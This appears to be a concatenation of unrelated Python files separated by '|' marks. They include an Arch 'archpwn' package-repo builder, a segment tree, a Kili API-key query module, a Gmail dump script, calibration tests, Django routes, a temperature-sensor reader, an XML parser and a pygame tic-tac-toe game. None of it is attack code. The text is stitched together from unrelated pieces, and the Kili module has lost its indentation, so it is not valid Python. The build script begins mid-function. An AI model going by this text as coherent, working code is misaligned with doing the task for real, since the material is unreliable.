        # Read only the part of the log appended since we started.
        f = open('/var/log/pacman.log', 'r')
        f.seek(st_size)
        installed = f.read()
        f.close()
        packs = re.findall(
            r"\[\d{4}-\d{2}-\d{2}\s\d{2}:\d{2}\]\s(\w+)\s([^\s]+)\s(.*)$",
            installed, re.MULTILINE)
        packs = map(lambda x: x[1], filter(lambda x: x[0] == 'installed', packs))
        if packs:
            self.info('These packages were installed as dependencies ' \
                      'and will be dropped:')
            self.info('%s' % packs)
            os.system('sudo pacman -Rd %s' % ' '.join(packs))
    def create_repo(self):
        """Regenerate the archpwn repository database from the built packages."""
        if self.built == 0:
            return  # nothing built, nothing to publish
        origdir = os.getcwd()
        os.chdir(self.dst)
        os.system("repo-add archpwn.db.tar.gz %s > /dev/null 2>&1" % \
                  " ".join(glob.glob("*.pkg.tar.xz")))
        self.info("archpwn.db succesfully updated.")
        os.chdir(origdir)
        os.system("sudo pacman -Sy --config scripts/archpwn-pacman.conf")
        self.info("archpwn.db succesfully synced.")
    def build_pkg(self, dir_path):
        """Run makepkg for one package dir, logging output and namcap results."""
        dir = os.path.basename(dir_path)
        try:
            outfile = PkgBuild(os.path.join(dir_path, "PKGBUILD")).get_output()
        except:
            self.error("Problem while building %s (PKGBUILD malformed)" % dir)
            return
        if not self.force and os.path.isfile(os.path.join(self.dst, outfile)):
            self.info("Package %s already built" % dir)
            return
        self.info("Building package %s" % dir)
        origdir = os.path.abspath(os.getcwd())
        logf = open(os.path.join(origdir, 'logs', 'build_%s.log' % dir), 'w')
        os.chdir(dir_path)
        mkpkg = "makepkg --noconfirm -s%s%s" % (
            (self.force) and " -f" or "",
            (self.nodeps) and " -d" or "")
        ret = None
        env = os.environ
        env['LC_ALL'] = 'C'  # stable, parseable tool output
        proc = Popen(mkpkg, env=env, shell=True, stdout=PIPE, stderr=STDOUT)
        try:
            # Stream makepkg output to both the console and the log file.
            while ret is None:
                buff = os.read(proc.stdout.fileno(), 1024)
                if buff:
                    sys.stdout.write(buff)
                    sys.stdout.flush()
                    logf.write(buff)
                ret = proc.poll()
        except KeyboardInterrupt:
            proc.kill()
            ret = -1
            self.warning("makepkg process killed.")
        logf.close()
        # Cleaning up the dir by removing 'pkg' and 'src' directories
        shutil.rmtree("src", True)
        shutil.rmtree("pkg", True)
        # Restore original directory
        os.chdir(origdir)
        if ret != 0:
            self.error("Error building %s. (Error status: %d)" % (dir, ret))
            self.warning("Take a look to logs/build_%s.log" % dir)
            self.failed.append(dir)
        elif not self.nonamcap:
            # NOTE(review): self.built is only incremented when namcap runs;
            # with --exclude-namcap the counter stays 0 and create_repo()
            # silently skips — confirm this is intended.
            self.built += 1
            output = os.path.join(self.dst, outfile)
            if os.system("namcap %s > logs/namcap_%s.log" % (output, dir)):
                self.warning("Namcap has detected some problems. Take "
                             "a look to logs/namcap_%s.log" % dir)
if __name__ == "__main__":
    # CLI: pkg-builder [options] <repodir> <srcdest> <pkgdest>
    parser = OptionParser(usage="%s [options] <repodir> <srcdest> <pkgdest>" % sys.argv[0])
    parser.add_option("-d", "--nodeps",
                      action="store_true", dest="nodeps", default=False,
                      help="don't include dependecy checking")
    parser.add_option("-f", "--force",
                      action="store_true", dest="force", default=False,
                      help="force rebuild if package is already present")
    parser.add_option("-x", "--exclude-namcap",
                      action="store_true", dest="nonamcap", default=False,
                      help="exclude namcap checking")
    (options, args) = parser.parse_args()
    if len(args) != 3:
        parser.print_help()
        sys.exit(-1)
    builder = Builder(args[0], args[1], args[2], \
                      options.nodeps, options.force, options.nonamcap)
    builder.build_all()
    builder.create_repo()
    if builder.failed:
        builder.warning("Not all packages have been generated successfully.")
        builder.warning("These are the missing: %s" % str(builder.failed))
    # Remove the generated ~/.makepkg.conf on the way out.
    os.remove(OUTFILE)
|
def nhuman(Y):
    """Print the given value (simple pass-through demo); returns None."""
    value = Y
    print(value)


nhuman(10)
|
class SegmentTree:
    """Array-backed segment tree over range add/min/max/xor/product queries.

    The query range (l, r) is fixed at construction; build_tree() fills the
    tree and get_result() answers the query.

    Fix: the backing array was sized 3*len(arr), which underallocates for
    some lengths (e.g. len(arr) == 40 requires node index 120) and raised
    IndexError; the standard safe bound 4*len(arr) is used instead.
    """
    def build_tree_hint(self):
        # Prints a usage/explanation message for build_tree().
        message = """
Build Segment Tree
------------------------------------
Purpose : Building a Segment tree for the given array and query
Method : Recursion
Time Complexity : Worst Case - O(n)
Working Hint:
Initialize relevant leaf nodes with array elements, and assign result of the query to the parent node.
Pseudocode :
--> if array_start_index == array_end_index:
--> Assign the corresponding leaf node the value of array element at array_start_index
--> return leaf node value
--> Find middle element of the array range [array_start_index, array_end_index]
--> Perform query on leaf nodes values and assign result to parent node
--> Return Parent Node Value
Example:
--> obj = SegmentTree([1,2,3,4,5,6,7], 2, 5) # (2,5) is the range of query to be performed on.
--> obj.build_tree(0,6) # 0 and 6 are starting and ending index of array
"""
        print(message)
    def get_result_hint(self):
        # Prints a usage/explanation message for get_result().
        message = """
Get Result of Range Query from Segment Tree
------------------------------------
Purpose : Building a Segment tree for the given array and query
Method : Recursion
Time Complexity : Worst Case - O(logn)
Working Hint:
Reach child nodes for the corresponding range, and return result of the query to the parent node.
Pseudocode :
--> if array_start_index and array_ending_index are inside query range:
--> return leaf node value
--> if array_start_index or array_ending_index is outside query range:
--> return constant for corresponding function
--> Find middle element of the array range [array_start_index, array_end_index]
--> Perform query on leaf nodes values and return the result
Example:
--> obj = SegmentTree([1,2,3,4,5,6,7], 2, 5) # (2,5) is the range of query to be performed on.
--> obj.build_tree(0,6) # 0 and 6 are starting and ending index of array
--> obj.get_result(0,6) # 0 and 6 are starting and ending index of array
"""
        print(message)
    def __init__(self,arr,l,r,function = 'add'):
        # FIX: 4*len(arr) is the standard safe bound for a recursively built
        # segment tree; 3*len(arr) overflows for some sizes (e.g. n == 40).
        self.tree = [None for _ in range(4*len(arr))]
        self.arr = arr
        self.l = l  # query range start (inclusive)
        self.r = r  # query range end (inclusive)
        self._function = ('add', 'min', 'max', 'xor', 'product')
        self.func = function
    @property
    def get_function_list(self):
        """
        Get The list of the avaliable functions available to create the segment tree of.
        Returns:
            tuple: Tuple of functions
        """
        return self._function
    def build_tree(self, ss, se, idx = 0):
        """
        Build the segment tree of the corresponding function.
        Args:
            ss ([int]): Starting Index
            se ([int]): Ending Index
            idx (int, optional): Index of segment tree node. Defaults to 0.
        """
        if ss==se:
            # leaf: store the array element directly
            self.tree[idx] = self.arr[ss]
            return self.tree[idx]
        mid = (ss + se) // 2
        # internal node: combine the two children with the chosen function
        if self.func == 'add':
            self.tree[idx] = self.build_tree(ss, mid, 2*idx+1) + self.build_tree(mid+1, se, 2*idx+2)
        elif self.func == 'min':
            self.tree[idx] = min(self.build_tree(ss, mid, 2*idx+1), self.build_tree(mid+1, se, 2*idx+2))
        elif self.func == 'max':
            self.tree[idx] = max(self.build_tree(ss, mid, 2*idx+1), self.build_tree(mid+1, se, 2*idx+2))
        elif self.func == 'xor':
            self.tree[idx] = self.build_tree(ss, mid, 2*idx+1) ^ self.build_tree(mid+1, se, 2*idx+2)
        elif self.func == 'product':
            self.tree[idx] = self.build_tree(ss, mid, 2*idx+1) * self.build_tree(mid+1, se, 2*idx+2)
        return self.tree[idx]
    def get_result(self, ss, se, idx = 0):
        """
        Answer the stored range query (self.l, self.r).
        Args:
            ss ([int]): Starting Index
            se ([int]): Ending Index
            idx (int, optional): Index of segment tree node. Defaults to 0.
        Returns:
            int/float: Result for the given range
        """
        if ss >= self.l and se <= self.r:
            # node range fully inside the query range
            return self.tree[idx]
        if se < self.l or ss > self.r:
            # node range fully outside: return the function's identity element
            if self.func == 'add':
                return 0
            elif self.func == 'min':
                return 10**9
            elif self.func == 'max':
                return -10**9
            elif self.func == 'xor':
                return 0
            elif self.func == 'product':
                return 1
        mid = (ss + se) // 2
        # partial overlap: combine results from both children
        if self.func == 'add':
            return self.get_result(ss,mid,2*idx+1) + self.get_result(mid+1,se,2*idx+2)
        elif self.func == 'min':
            return min(self.get_result(ss,mid,2*idx+1), self.get_result(mid+1,se,2*idx+2))
        elif self.func == 'max':
            return max(self.get_result(ss,mid,2*idx+1), self.get_result(mid+1,se,2*idx+2))
        elif self.func == 'xor':
            return self.get_result(ss,mid,2*idx+1) ^ self.get_result(mid+1,se,2*idx+2)
        elif self.func == 'product':
            return self.get_result(ss,mid,2*idx+1) * self.get_result(mid+1,se,2*idx+2)
|
"""
Api key queries
"""
from typing import Generator, List, Optional, Union
import warnings
from typeguard import typechecked
from ...helpers import Compatible, format_result, fragment_builder
from .queries import gql_api_keys, GQL_API_KEYS_COUNT
from ...types import ApiKey as ApiKeyType
from ...utils import row_generator_from_paginated_calls
class QueriesApiKey:
"""
Set of ApiKey queries
"""
# pylint: disable=too-many-arguments,too-many-locals
    def __init__(self, auth):
        """
        Initialize the API-key query mixin.

        Parameters
        ----------
        auth : KiliAuth object
            Authenticated session used by the query methods below.
        """
        # Kept on the instance so every query method can reach the session.
        self.auth = auth
    # pylint: disable=dangerous-default-value
    @Compatible(['v2'])
    @typechecked
    def api_keys(self, api_key_id: Optional[str] = None, user_id: Optional[str] = None,
                 api_key: Optional[str] = None, skip: int = 0,
                 fields: List[str] = ['id', 'name', 'createdAt', 'revoked'],
                 first: Optional[int] = 100,
                 disable_tqdm: bool = False,
                 as_generator: bool = False) -> Union[List[dict], Generator[dict, None, None]]:
        # pylint: disable=line-too-long
        """
        Gets a generator or a list of API keys that match a set of constraints
        Parameters
        ----------
        api_key_id :
            The unique id of the api key to retrieve.
        user_id :
            Identifier of the user (you can only query your own api keys).
        api_key :
            Value of the api key (you can only query your own api keys).
        skip :
            Number of assets to skip (they are ordered by their date of creation, first to last).
        fields :
            All the fields to request among the possible fields for the assets.
            See [the documentation](https://cloud.kili-technology.com/docs/python-graphql-api/graphql-api/#apikey) for all possible fields.
        first :
            Maximum number of assets to return.
        disable_tqdm :
            If True, the progress bar will be disabled
        as_generator:
            If True, a generator on the API key is returned.
        Returns
        -------
        result:
            a result object which contains the query if it was successful, or an error message else.
        Examples
        -------
        >>> kili.api_keys(user_id=user_id)
        >>> kili.api_keys(api_key=api_key)
        >>> kili.api_keys(api_key=api_key, as_generator=False)
        """
        saved_args = locals()
        # Keep only the filter arguments understood by the count query.
        count_args = {
            k: v
            for (k, v) in saved_args.items()
            if k
            in [
                'user_id',
                'api_key_id',
                'api_key'
            ]
        }
        # A lazily-consumed generator has no known length, so a progress bar
        # would be meaningless — force it off in that case.
        disable_tqdm = disable_tqdm or as_generator
        payload_query = {
            'where': {
                'user': {
                    'id': user_id,
                    'apiKey': api_key
                },
                'id': api_key_id,
            },
        }
        # Paginate transparently: count first, then fetch page by page.
        api_keys_generator = row_generator_from_paginated_calls(
            skip,
            first,
            self.count_api_keys,
            count_args,
            self._query_api_keys,
            payload_query,
            fields,
            disable_tqdm
        )
        if as_generator:
            return api_keys_generator
        return list(api_keys_generator)
def _query_api_keys(self,
skip: int,
first: int,
payload: dict,
fields: List[str]):
payload.update({'skip': skip, 'first': first})
_gql_api_keys = gql_api_keys(fragment_builder(fields, ApiKeyType))
result = self.auth.client.execute(_gql_api_keys, payload)
return format_result('data', result)
@Compatible(['v2'])
@typechecked
def count_api_keys(self, api_key_id: Optional[str] = None, user_id: Optional[str] = None,
api_key: Optional[str] = None) -> int:
"""
Count and return the number of api keys with the given constraints
Parameters
----------
api_key_id :
The unique id of the api key to retrieve.
user_id :
Identifier of the user (you can only query your own api keys).
api_key :
Value of the api key (you can only query your own api keys).
Returns
-------
dict
A result object which contains the query if it was successful, or an error message else.
Examples
-------
>>> kili.count_api_keys(user_id=user_id)
3
>>> kili.count_api_keys(api_key=api_key)
1
"""
variables = {
'where': {
'user': {
'id': user_id,
'apiKey': api_key
},
'id': api_key_id,
},
}
result = self.auth.client.execute(GQL_API_KEYS_COUNT, variables)
count = format_result('data', result)
return count
|
import json
# client = gmail_client.get_gmail_client(config.CLIENT_SECRET_FILE_PATH, config.SCOPES, secret.APPLICATION_NAME)
# # # ids = gmail_handling.get_unread_email_ids(client)
# # # messages = [client.users().messages().get(userId='me', id=i).execute() for i in ids]
# # # j = json.dumps(messages)
# # # with open('temp_file.json', 'w') as f:
# # # f.write(j)
# #
# #
# response = client.users().messages().list(userId='me').execute()
# messages = []
# messages.extend(response['messages'])
#
# while 'nextPageToken' in response:
# page_token = response['nextPageToken']
# response = client.users().messages().list(userId='me', pageToken=page_token).execute()
# messages.extend(response['messages'])
#
# with open('temp_file.json', 'w') as f:
# f.write(json.dumps(messages))
#
#
#
# #
# def get_emails(client, email_ids):
# return [client.users().messages().get(userId='me', id=this_id).execute() for this_id in email_ids]
#
# with open('temp_file.json', 'r') as f:
# # all_m = json.loads(f.read())
# # gillians_thread = [thing for thing in all_m if thing['threadId'] == ''
# ids = [thing['id'] for thing in json.loads(f.read())]
#
# messages = get_emails(client, ids)
# with open('temp_file2.json', 'w') as f:
# f.write(json.dumps(messages))
# Re-hydrate the previously-dumped Gmail message list from disk.
with open('temp_file2.json', 'r') as f:
    # Bug fix: json.loads() was called with no argument (TypeError);
    # json.load(f) parses the open file object directly.
    emails = json.load(f)
# response = client.users().messages().list(userId='me', q="from:al.avery.dev@gmail.com is:unread").execute()
# print(response)
# print(client.users().messages().get(userId='me', id='1608142e27795680').execute())
|
from python_framework import Enum, EnumItem
# Enumeration of week days; `associateReturnsTo='number'` presumably makes the
# enum resolve to the `number` attribute — confirm against python_framework docs.
@Enum(associateReturnsTo='number')
class WeekDayEnumeration :
    # `number` follows the datetime.weekday() convention (Monday == 0 ...
    # Sunday == 6); `short` is a three-letter lowercase abbreviation.
    MONDAY = EnumItem(number=0, short='mon')
    TUESDAY = EnumItem(number=1, short='tue')
    WEDNESDAY = EnumItem(number=2, short='wed')
    THURSDAY = EnumItem(number=3, short='thu')
    FRIDAY = EnumItem(number=4, short='fri')
    SATURDAY = EnumItem(number=5, short='sat')
    SUNDAY = EnumItem(number=6, short='sun')
# Module-level singleton used by callers to look up week days.
WeekDay = WeekDayEnumeration()
|
import os
from unittest.mock import patch
import numpy as np
import pandas as pd
from numpy.testing import assert_allclose, assert_almost_equal
from autumn.core import db
from autumn.calibration import Calibration, CalibrationMode
from autumn.calibration.utils import (
sample_starting_params_from_lhs,
specify_missing_prior_params,
)
from tests.utils import get_mock_model
def test_sample_starting_params_from_lhs__with_lognormal_prior_and_one_sample():
    """A single LHS sample from lognormal(-1, 1) is the median exp(-1)."""
    lognormal_prior = {
        "param_name": "ice_cream_sales",
        "distribution": "lognormal",
        "distri_params": [-1, 1],
    }
    priors = [lognormal_prior]
    specify_missing_prior_params(priors)
    samples = sample_starting_params_from_lhs(priors, n_samples=1)
    assert_almost_equal(samples[0]["ice_cream_sales"], 0.36787944117144233)
def test_sample_starting_params_from_lhs__with_beta_prior_and_one_sample():
    """One LHS sample from a beta prior with mean 0.05 and CI [0.01, 0.1]."""
    beta_prior = {
        "param_name": "ice_cream_sales",
        "distribution": "beta",
        "distri_mean": 0.05,
        "distri_ci": [0.01, 0.1],
    }
    priors = [beta_prior]
    specify_missing_prior_params(priors)
    samples = sample_starting_params_from_lhs(priors, n_samples=1)
    assert_almost_equal(samples[0]["ice_cream_sales"], 0.04680260472064115)
def test_sample_starting_params_from_lhs__with_gamma_prior_and_one_sample():
    """One LHS sample from a gamma prior with mean 5 and CI [3, 7]."""
    gamma_prior = {
        "param_name": "ice_cream_sales",
        "distribution": "gamma",
        "distri_mean": 5.0,
        "distri_ci": [3.0, 7.0],
    }
    priors = [gamma_prior]
    specify_missing_prior_params(priors)
    samples = sample_starting_params_from_lhs(priors, n_samples=1)
    assert_almost_equal(samples[0]["ice_cream_sales"], 4.932833078981056)
def test_sample_starting_params_from_lhs__with_uniform_prior_and_one_sample():
    """A single LHS sample from U(1, 5) lands on the midpoint 3."""
    priors = [
        {"param_name": "ice_cream_sales", "distribution": "uniform", "distri_params": [1, 5]}
    ]
    specify_missing_prior_params(priors)
    samples = sample_starting_params_from_lhs(priors, n_samples=1)
    expected = [{"ice_cream_sales": 3.0}]
    assert _prepare_params(samples) == _prepare_params(expected)
def test_sample_starting_params_from_lhs__with_uniform_priors_and_one_sample():
    """With one sample, LHS returns each uniform prior's midpoint."""
    priors = [
        {"param_name": name, "distribution": "uniform", "distri_params": bounds}
        for name, bounds in [("ice_cream_sales", [1, 5]), ("air_temp", [1, 10])]
    ]
    specify_missing_prior_params(priors)
    samples = sample_starting_params_from_lhs(priors, n_samples=1)
    expected = [{"ice_cream_sales": 3.0, "air_temp": 5.5}]
    assert _prepare_params(samples) == _prepare_params(expected)
def test_sample_starting_params_from_lhs__with_uniform_prior_and_two_samples():
    """Two LHS samples from U(1, 5) hit the two stratum midpoints 2 and 4."""
    priors = [{"param_name": "ice_cream_sales", "distribution": "uniform", "distri_params": [1, 5]}]
    specify_missing_prior_params(priors)
    samples = sample_starting_params_from_lhs(priors, n_samples=2)
    expected = [{"ice_cream_sales": 2.0}, {"ice_cream_sales": 4.0}]
    assert _prepare_params(samples) == _prepare_params(expected)
def test_sample_starting_params_from_lhs__with_uniform_priors_and_two_samples():
    """Two LHS samples over two uniforms hit stratum midpoints in either pairing."""
    priors = [
        {"param_name": "ice_cream_sales", "distribution": "uniform", "distri_params": [1, 5]},
        {"param_name": "air_temp", "distribution": "uniform", "distri_params": [1, 10]},
    ]
    specify_missing_prior_params(priors)
    samples = sample_starting_params_from_lhs(priors, n_samples=2)
    pairing_a = [
        {"ice_cream_sales": 2.0, "air_temp": 3.25},
        {"ice_cream_sales": 4.0, "air_temp": 7.75},
    ]
    pairing_b = [
        {"ice_cream_sales": 4.0, "air_temp": 3.25},
        {"ice_cream_sales": 2.0, "air_temp": 7.75},
    ]
    observed = _prepare_params(samples)
    assert observed == _prepare_params(pairing_a) or observed == _prepare_params(pairing_b)
def test_sample_starting_params_from_lhs__with_uniform_prior_and_four_samples():
    """Four LHS samples from U(1, 5) are the four stratum midpoints 1.5..4.5."""
    priors = [{"param_name": "ice_cream_sales", "distribution": "uniform", "distri_params": [1, 5]}]
    specify_missing_prior_params(priors)
    samples = sample_starting_params_from_lhs(priors, n_samples=4)
    expected = [{"ice_cream_sales": 1.5 + stratum} for stratum in range(4)]
    assert _prepare_params(samples) == _prepare_params(expected)
def _prepare_params(l):
return set([tuple(sorted(ps.items())) for ps in l])
from autumn.calibration.priors import UniformPrior
from autumn.calibration.targets import PoissonTarget
from autumn.core.project import Project, ParameterSet, Params
def test_calibrate_autumn_mcmc(temp_data_dir):
    """End-to-end MCMC calibration smoke test against the mock shark model."""
    # One uniform prior over the parameter the mock model feeds through.
    priors = [UniformPrior("ice_cream_sales", [1, 5])]
    # Observed series is exactly 3 * [1..5], so the MLE should sit near 3.
    target_outputs = [
        PoissonTarget(
            pd.Series(
                [3, 6, 9, 12, 15], [2000, 2001, 2002, 2003, 2004], name="shark_attacks"
            )
        ),
    ]
    calib = Calibration(priors, target_outputs, seed=0)
    calib._no_pickle = True
    params = ParameterSet(Params({"ice_cream_sales": 0, "time": {"start": 2000}}))
    project = Project("hawaii", "sharks", _build_mock_model, params, calib)
    calib.run(project, 1, 1, 1)
    # Calibration writes exactly one run directory holding a single database.
    app_dir = os.path.join(temp_data_dir, "outputs", "calibrate", "sharks", "hawaii")
    run_dir = os.path.join(app_dir, os.listdir(app_dir)[0])
    db_paths = db.load.find_db_paths(run_dir)
    assert len(db_paths) == 1
    out_db = db.get_database(db_paths[0])
    assert set(out_db.table_names()) == {
        "derived_outputs",
        "mcmc_run",
        "mcmc_params",
    }
    # The maximum-likelihood parameter estimate should recover the target slope.
    mcmc_runs = out_db.query("mcmc_run")
    mcmc_params = out_db.query("mcmc_params")
    mle_params = db.process.find_mle_params(mcmc_runs, mcmc_params)
    ice_cream_sales_mle = mle_params["ice_cream_sales"]
    # +++FIXME Should be deterministic now
    assert 2.9 < ice_cream_sales_mle < 3.1
def _build_mock_model(params, build_options=None):
    """
    Fake model building function where derived output "shark_attacks"
    is influenced by the ice_cream_sales input parameter.
    """
    sales = params["ice_cream_sales"]
    multipliers = [0, 1, 2, 3, 4, 5]
    shark_attacks = np.array([sales * m for m in multipliers])
    compartment_outputs = [
        [300.0, 300.0, 300.0, 33.0, 33.0, 33.0, 93.0, 39.0],
        [271.0, 300.0, 271.0, 62.0, 33.0, 62.0, 93.0, 69.0],
        [246.0, 300.0, 246.0, 88.0, 33.0, 88.0, 93.0, 89.0],
        [222.0, 300.0, 222.0, 111.0, 33.0, 111.0, 39.0, 119.0],
        [201.0, 300.0, 201.0, 132.0, 33.0, 132.0, 39.0, 139.0],
        [182.0, 300.0, 182.0, 151.0, 33.0, 151.0, 39.0, 159.0],
    ]
    return get_mock_model(
        times=np.array([1999, 2000, 2001, 2002, 2003, 2004]),
        outputs=compartment_outputs,
        derived_outputs={"shark_attacks": shark_attacks},
    )
|
from django.conf.urls import url
from api import views
from django.conf.urls.static import static
from django.conf import settings
from rest_framework_jwt.views import obtain_jwt_token
# URL routes for the API app; each resource exposes a collection endpoint and
# an optional numeric-pk detail endpoint handled by the same view function.
urlpatterns = [
    # Department CRUD.
    url(r'^department/$', views.DepartmentAPIClassView.departmentApi),
    url(r'^department/([0-9]+)$', views.DepartmentAPIClassView.departmentApi),
    # Employee CRUD.
    url(r'^employee/$', views.EmployeeAPIClassView.employeeApi),
    url(r'^employee/([0-9]+)$', views.EmployeeAPIClassView.employeeApi),
    # File upload endpoint.
    url(r'^SaveFile$', views.SaveFile),
    # JWT authentication: POST credentials, receive a token.
    url(r'^login/$', obtain_jwt_token),
    # Student and course CRUD.
    url(r'^student/$', views.studentApi),
    url(r'^student/([0-9]+)$', views.studentApi),
    url(r'^course/$', views.courseApi),
    url(r'^course/([0-9]+)$', views.courseApi)
] + static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
import os
import glob
import time
os.system('modprobe w1-gpio') # turns on GPIO module
os.system('modprobe w1-therm') # Turns on temperature module
# Finds Device File that holds Temperature Data
base_dir = '/sys/bus/w1/devices/'
# NOTE(review): assumes at least one 1-wire device folder matching '28*'
# exists (DS18B20-style id prefix) — IndexError otherwise; confirm on target.
device_folder = glob.glob(base_dir + '28*')[0]
device_file = device_folder + '/w1_slave'
#Function that reads sensor data
def read_temp_raw():
    """Return the raw text lines of the 1-wire slave device file."""
    with open(device_file, 'r') as sensor_file:
        return sensor_file.readlines()
#Convert the value of the sensor into a temperature
def read_temp():
    """Return (celsius, fahrenheit) from the sensor file, or None if no reading."""
    lines = read_temp_raw()
    # The first line ends in 'YES' when the sensor's CRC check passed;
    # otherwise wait 0.2 s and re-read the device file.
    while not lines[0].strip().endswith('YES'):
        time.sleep(0.2)
        lines = read_temp_raw()
    # The reading appears after 't=' on the second line, in millidegrees C.
    marker = lines[1].find('t=')
    if marker != -1:
        millidegrees = lines[1][marker + 2:]
        celsius = float(millidegrees) / 1000.0
        fahrenheit = celsius * 9.0 / 5.0 + 32.0
        return celsius, fahrenheit
# Poll and print the temperature tuple once per second, forever.
while True:
    print(read_temp())
    time.sleep(1)
# -*- coding: utf-8 -*-
from xml.etree import ElementTree
class XMLParser():
    '''
    This class is responsible for extracting information from an XML file
    representing a database structure with some data (optional).

    Expected layout: <database name="..."> containing <table name="..."
    [dependencies="a b"]> elements, each holding <column name="..."
    type="..." [reference="..."]> elements whose <row>text</row> children
    carry the optional data.

    @filename xml file name
    '''

    def __init__(self, fileName):
        self.file = fileName
        self.databaseName = ""
        self.rows = list()
        self.tables = list()
        # Parsed ElementTree; stays None until parse() succeeds.
        self.tree = None

    def parse(self):
        '''
        Load and store the xml tree structure
        '''
        with open(self.file, 'rt') as f:
            self.tree = ElementTree.parse(f)

    def generate(self):
        '''
        Generate a structure with table and data informations to be
        processed and inserted. Must be called after parse(); it is a
        no-op when nothing has been parsed yet.
        '''
        # Bug fix: the tree used to be dereferenced (getroot) before the
        # `if self.tree:` guard, so generate() before parse() crashed with
        # AttributeError; compare against None explicitly instead.
        if self.tree is None:
            return
        self.databaseName = self.tree.getroot().attrib["name"]
        # tables data to be used in tables creation
        tables = list()
        # rows data to be inserted after tables creation
        rows = list()
        for table in self.tree.findall('.//table'):
            t = dict()
            table_info = table.attrib
            # add table name
            t["name"] = table_info["name"]
            # add table dependencies if it has one
            if "dependencies" in table_info:
                t["dependencies"] = table_info["dependencies"].split()
            column_data = list()
            for column in table.findall(".//column"):
                c = dict()
                column_info = column.attrib
                c["name"] = column_info["name"]
                c["type"] = column_info["type"]
                if "reference" in column_info:
                    c["reference"] = column_info["reference"]
                column_data.append(c)
                # row numbering restarts for every column
                row_number = 0
                for row in column.findall(".//row"):
                    r = dict()  # row info
                    r["tablename"] = table_info["name"]
                    r["columnname"] = column_info["name"]
                    r["columndata"] = row.text
                    r["rownumber"] = row_number
                    rows.append(r)
                    row_number = row_number + 1
            # add the collected column descriptions
            t["columns"] = column_data
            tables.append(t)
        self.tables = tables
        self.rows = rows

    def getTablesInfo(self):
        '''Table descriptions collected by generate().'''
        return self.tables

    def getTablesData(self):
        '''Row records collected by generate().'''
        return self.rows

    def getDatabaseName(self):
        '''Database name read from the root element (set by generate()).'''
        return self.databaseName
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
import pygame
pygame.init()
# 550x550 window: nine 150x150 cells separated by 25 px gutters.
screen = pygame.display.set_mode((550, 550))
pygame.display.set_caption('Tic-Tac-Toe')
# Board cells in reading order; pygame.draw.rect returns each cell's Rect,
# later used for click hit-testing.
first = pygame.draw.rect(screen, (255, 255, 255), (25, 25, 150, 150))
second = pygame.draw.rect(screen, (255, 255, 255), (200, 25, 150, 150))
third = pygame.draw.rect(screen, (255, 255, 255), (375, 25, 150, 150))
fourth = pygame.draw.rect(screen, (255, 255, 255), (25, 200, 150, 150))
fifth = pygame.draw.rect(screen, (255, 255, 255), (200,200,150,150))
sixth = pygame.draw.rect(screen, (255, 255, 255), (375,200,150,150))
seventh = pygame.draw.rect(screen, (255, 255, 255), (25, 375, 150, 150))
eighth = pygame.draw.rect(screen, (255, 255, 255), (200, 375, 150, 150))
ninth = pygame.draw.rect(screen, (255, 255, 255), (375, 375, 150, 150))
# End-of-game screens; the image files must sit next to the script.
rect_won = pygame.image.load('rect won.png')
circle_won = pygame.image.load('circle won.png')
draw = pygame.image.load('draw.png')
running = True
# Which shape is placed next: 'rect' draws X (red square), anything else O.
draw_object = 'rect'
# Per-cell availability flags, one per board cell (True until played).
al_p = True
sal_p = True
tal_p = True
foal_p = True
fial_p = True
sial_p = True
seal_p = True
eal_p = True
nal_p = True
# Logical board state: 'X', 'O', or ' ' per cell, reading order.
li = [' ' for i in range(9)]
# Result holder written by checkresult(): 'X', 'O', 'Draw', or ''.
var = ''
def checkresult(li):
    """Return 'X' or 'O' when that mark has three in a row, 'Draw' when the
    board is full with no winner, otherwise the previous value of the global
    ``var`` ('' while a game is in progress).

    Side effect: updates the global ``var``, which the main loop reads to
    pick the end-of-game screen.

    Bug fixes vs the original: the `abs(count) < 2` gate (which silently
    skipped win detection on unbalanced boards), the shadowing of the
    builtin ``bool``, and the unused ``ec``/``acount`` locals are gone.
    """
    global var
    # The eight winning triples: three rows, three columns, two diagonals.
    wins = [
        (0, 1, 2), (3, 4, 5), (6, 7, 8),
        (0, 3, 6), (1, 4, 7), (2, 5, 8),
        (0, 4, 8), (2, 4, 6),
    ]
    for a, b, c in wins:
        if li[a] == li[b] == li[c] != ' ':
            var = li[a]
            return var
    # No winner: a full board is a draw; otherwise keep the previous result.
    if ' ' not in li:
        var = 'Draw'
    return var
# Top-left corner of each 150x150 board cell, in reading order (indices 0-8
# of ``li``). Drives the data-driven click handling below, replacing the
# nine copy-pasted first..ninth / al_p..nal_p handler blocks.
CELL_TOPS = [
    (25, 25), (200, 25), (375, 25),
    (25, 200), (200, 200), (375, 200),
    (25, 375), (200, 375), (375, 375),
]

def _paint_empty_board():
    """Draw the nine white cells and return their Rects in board order."""
    return [
        pygame.draw.rect(screen, (255, 255, 255), (x, y, 150, 150))
        for x, y in CELL_TOPS
    ]

# Cell Rects and per-cell availability flags, index-aligned with ``li``.
cells = _paint_empty_board()
available = [True] * 9
while running:
    pygame.time.delay(300)
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
        if event.type == pygame.KEYDOWN:
            if event.key == pygame.K_SPACE:
                # Space restarts the game: clear all state, repaint the board.
                screen.fill((0, 0, 0))
                li = [' ' for _ in range(9)]
                draw_object = 'rect'
                var = ''
                cells = _paint_empty_board()
                available = [True] * 9
        if event.type == pygame.MOUSEBUTTONUP:
            pos = pygame.mouse.get_pos()
            for index, cell in enumerate(cells):
                if not (cell.collidepoint(pos) and available[index]):
                    continue
                x, y = CELL_TOPS[index]
                if draw_object == 'rect':
                    # X: red square inset 25 px inside the cell.
                    pygame.draw.rect(screen, (255, 0, 0), (x + 25, y + 25, 100, 100))
                    draw_object = 'c'
                    li[index] = 'X'
                else:
                    # O: green circle centred in the cell.
                    pygame.draw.circle(screen, (0, 255, 0), (x + 75, y + 75), 50)
                    draw_object = 'rect'
                    li[index] = 'O'
                available[index] = False
        # checkresult updates the global ``var``; a truthy return means the
        # game has ended and the matching end screen should be shown.
        b = checkresult(li)
        if b:
            if var == 'X':
                screen.fill((255, 0, 0))
                screen.blit(rect_won, (101, 184))
            elif var == "O":
                screen.fill((0, 255, 0))
                screen.blit(circle_won, (115, 114))
            else:
                screen.fill((255, 255, 255))
                screen.blit(draw, (159, 216))
            b = False
    pygame.display.update()
|
from queue import Queue
from typing import List, Any
from networkx.algorithms import bipartite, distance_measures, approximation, cycles
from tabulate import tabulate
import networkx as nx
import scipy.linalg as la
from matplotlib import pyplot as plt
import networkx.linalg.spectrum as spec
import numpy as np
